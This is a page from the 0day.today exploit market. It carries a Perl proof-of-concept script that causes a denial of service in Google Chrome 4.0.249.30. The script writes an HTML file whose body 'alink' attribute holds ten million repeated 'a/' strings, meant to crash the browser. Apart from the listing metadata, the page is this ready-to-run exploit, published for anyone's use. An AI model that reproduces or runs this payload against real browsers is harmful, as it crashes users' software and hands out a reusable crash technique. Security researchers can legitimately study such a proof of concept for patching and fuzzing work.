[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Google Chrome 4.0.249.30 DoS PoC

Author
73o
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9825
Category
dos / poc
Date add
03-01-2010
Platform
unsorted
================================
Google Chrome 4.0.249.30 DoS PoC
================================

# Title: Google Chrome 4.0.249.30 DoS PoC
# CVE-ID: ()
# OSVDB-ID: ()
# Published: 2010-01-03
# Verified: yes

view source
print?
#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#Info: In ordinary cases browser would redirect to "http://www.google.com"
#but in this case browser will report error for something that should
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa
 
 
$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";




#  0day.today [2024-05-20]  #